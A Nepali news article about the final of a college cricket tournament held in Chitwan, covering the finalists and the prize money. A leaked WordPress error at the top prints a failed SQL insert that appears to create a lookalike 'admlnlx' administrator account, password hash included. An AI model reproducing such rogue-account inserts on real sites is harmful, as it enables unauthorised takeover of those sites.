WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2J3Cim7T7EJjpj3UTZPS.VaBVbF3v0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:55:41', '', 'admlnlx', 'admlnlx')
चितवन,माघ ५ –
चितवनमा भएको चौथो शिव पौडेल स्मृति अन्तराष्ट्रिय आमन्त्रण क्रिकेटको फाइनल खेल आगामी माघ १६ गते हुने भएको छ । राजधानीमा बुधबार पत्रकार सम्मेलन गर्दै आयोजकले उपाधि भिडन्त सहिद दिवसको अवसर पारेर कीर्तिपुरस्थित त्रिवी मैदानमा गर्ने जनाएको हो ।
नेपाल विद्यार्थी संघ वीरेन्द्र बहुमुखी क्याम्पस इकाईको आयोजनमा भएको प्रतियोगिताको फाइनलमा काठमाडौंका दुई कलेज सीसीआरसी कलेज र हार्ट लन्ड एकेडमी भिड्ने छन् । सेमिफाइनलमा सीसीआरसीले नेपाल पोलिटेक्निक र हार्ट लनडले आयोजक वीरेन्द्र बहुमुखीलाई पराजित गरेको थियो ।
प्रतियोगितामा १२ टिमले लिगकम नकआउटका आधारमा प्रतिस्पर्धा गरेका थिए । विजेताले २ लाख ६८ हजार ९०२ तथा उपविजेताले १ लाख ३५ हजार ९०२ नगद पुरस्कार जित्नेछन् । त्यस्तै म्यान अफ दि सिरिजले १५ तथा उत्कृष्ट ब्याट्सम्यान र बलरले समान ५–५ हजार जित्नेछन् । उत्कृष्ट बलर र ब्याट्सम्यानको पुरस्कार रकम नेपाली क्रिकेट समर्थक समाजले सौजन्य गर्ने कार्यक्रम संयोजक अनिल अधिकारीले जानकारी दिए ।